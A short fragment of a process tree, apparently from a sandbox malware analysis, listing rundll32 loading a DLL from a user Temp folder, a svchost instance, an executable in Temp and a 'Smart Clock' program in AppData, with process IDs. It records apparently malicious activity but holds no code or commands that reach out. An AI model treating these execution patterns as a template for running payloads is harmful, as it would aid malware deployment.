C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4996
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3352
-
C:\Users\Admin\AppData\Local\Temp\2449.exeC:\Users\Admin\AppData\Local\Temp\2449.exe1⤵PID:4676
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:3324
-